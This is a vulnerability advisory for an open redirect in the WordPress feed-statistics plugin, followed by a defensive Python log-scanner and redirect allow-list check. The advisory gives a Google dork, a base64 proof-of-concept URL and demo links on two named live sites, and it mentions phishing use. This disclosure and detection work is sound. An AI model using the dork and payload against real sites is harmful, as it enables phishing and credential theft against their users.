WordPress Feed-Statistics 4.1 Open Redirect

2017.12.22
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-601

[+] Title: WordPress feed-statistics Plugin Open Redirect Vulnerability
[+] Date: 2017-12-20
[+] Author: Mostafa Gharzi
[+] Vendor Homepage: www.WordPress.org
[+] Tested on: Windows 10 & Kali Linux
[+] Vulnerable File: /feed-statistics.php?url=
[+] Vulnerable Parameter: Get Method
[+] Dork: inurl:/wp-content/plugins/wordpress-feed-statistics/feed-statistics.php?url=

### Notes:
An unvalidated redirect vulnerability in the feed-statistics plugin for WordPress: the application accepts untrusted input and uses it as the target of a redirect, so the request is sent to whatever URL is contained in that input. By substituting a malicious site for the expected URL, an attacker can run a phishing campaign and steal user credentials.

### URL Encoded by Base64:
[+] Example: https://www.google.com/ ==> Base64 Algorithm ==> aHR0cHM6Ly93d3cuZ29vZ2xlLmNvbS8=

### POC:
[+] http://Site/wp-content/plugins/wordpress-feed-statistics/feed-statistics.php?url=[URL Encoded by Base64]

### Demo:
[+] http://blog.caplin.com/wp-content/plugins/wordpress-feed-statistics/feed-statistics.php?url=aHR0cHM6Ly93d3cuZ29vZ2xlLmNvbS8=
[+] http://fabianferber.de/wp-content/plugins/wordpress-feed-statistics/feed-statistics.php?url=aHR0cHM6Ly93d3cuZ29vZ2xlLmNvbS8=

### Special Thanks:
[+] CertCC.ir
[+] Gucert.ir
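As an added example (not part of the advisory, and not the plugin's own code), the following Python script does two things a defender wants here: it scans web-server access-log lines for requests to the redirecting script whose base64 `url=` value decodes to an off-site target, and it contains the allow-list check a fixed redirect handler should apply before following such a URL. The log lines, client IPs and the `blog.example.com` host are constructed; the base64 value for https://www.google.com/ is the one the advisory itself uses.

```python
import base64
import binascii
import re
from urllib.parse import unquote, urlsplit

# Redirecting script named in the advisory, and an Apache combined-log line pattern.
VULN_PATH = "/wp-content/plugins/wordpress-feed-statistics/feed-statistics.php"
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "[A-Z]+ (?P<uri>\S+) [^"]*" (?P<status>\d{3})')

def decode_redirect_target(encoded):
    """Base64-decode a ?url= value as the advisory describes; None if it is not valid base64/UTF-8."""
    try:
        return base64.b64decode(encoded, validate=True).decode("utf-8")
    except (binascii.Error, UnicodeDecodeError, ValueError):
        return None

def is_safe_target(target, allowed_hosts):
    """Mitigation check: site-relative path or http(s) URL with an allow-listed host; //host, user@host and other schemes fail."""
    parts = urlsplit(target)
    if not parts.scheme and not parts.netloc:
        return target.startswith("/") and not target.startswith("//")
    return parts.scheme in ("http", "https") and parts.hostname in allowed_hosts

def url_params(query):
    # unquote, not unquote_plus: '+' is part of the base64 alphabet and must survive.
    return [unquote(p[4:]) for p in query.split("&") if p.startswith("url=")]

def flag_open_redirects(log_lines, site_host):
    """Return (client_ip, decoded_target) for each request to the script that would redirect off-site."""
    hits = []
    for line in log_lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        uri = urlsplit(m.group("uri"))
        if not uri.path.endswith(VULN_PATH):
            continue
        for encoded in url_params(uri.query):
            target = decode_redirect_target(encoded)
            if target is not None and not is_safe_target(target, {site_host}):
                hits.append((m.group("ip"), target))
    return hits

# Constructed sample log lines (IPs and blog.example.com invented); line 1 carries the advisory's base64 for https://www.google.com/, line 2 "L2ZlZWQ=" (/feed).
CONSTRUCTED_LOG = [
    f'203.0.113.7 - - [22/Dec/2017:10:00:01 +0100] "GET {VULN_PATH}?url=aHR0cHM6Ly93d3cuZ29vZ2xlLmNvbS8= HTTP/1.1" 302 0',
    f'203.0.113.8 - - [22/Dec/2017:10:00:02 +0100] "GET {VULN_PATH}?url=L2ZlZWQ= HTTP/1.1" 302 0',
    f'203.0.113.9 - - [22/Dec/2017:10:00:03 +0100] "GET {VULN_PATH}?url=%%%notbase64 HTTP/1.1" 302 0',
    '198.51.100.4 - - [22/Dec/2017:10:00:04 +0100] "GET /index.php HTTP/1.1" 200 1234',
]
```

Only the first constructed line is reported: the second decodes to a site-relative path, the third is not valid base64 and is skipped rather than trusted, and the fourth does not touch the script.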